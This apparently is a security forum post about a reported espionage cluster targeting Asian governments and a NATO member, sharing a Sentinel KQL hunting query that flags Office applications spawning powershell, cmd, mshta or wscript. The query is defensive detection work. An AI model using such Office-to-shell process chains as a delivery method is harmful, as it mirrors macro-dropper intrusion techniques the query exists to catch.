SHADOW-EARTH-053: Deep Dive on New Asian & NATO Espionage Campaign

Just caught the Trend Micro report on the new threat cluster SHADOW-EARTH-053. It looks like a significant escalation in cyber-espionage, specifically targeting government and defense sectors across South, East, and Southeast Asia, plus a notable NATO member state.

While the article is light on specific CVEs right now, the targeting of journalists and activists alongside government bodies suggests a classic "information harvesting" operation. We've seen similar TTPs from China-aligned actors before, utilizing custom malware and phishing lures relevant to regional geopolitical events.

Since detailed IoCs are still emerging, I've updated our hunting queries to look for the initial access vectors usually associated with these groups—specifically, suspicious child process executions from Office products and unusual network traffic patterns.

Here is a KQL query I’m running in Sentinel to catch potential macro-based droppers or spear-phishing attempts commonly used in these campaigns:

DeviceProcessEvents
| where Timestamp > ago(3d)
| where InitiatingProcessFileName in~ ('winword.exe', 'excel.exe', 'powerpnt.exe')
| where ProcessFileName in~ ('powershell.exe', 'cmd.exe', 'mshta.exe', 'wscript.exe')
| project Timestamp, DeviceName, InitiatingProcessCommandLine, ProcessCommandLine, FolderPath
| order by Timestamp desc

Given the breadth of targets across Asia and Europe, I'm curious if anyone else in the forum has observed similar spikes in phishing traffic or suspicious C2 callbacks in their logs recently? Are we seeing a shift back to macro-based delivery, or is it all web shells these days?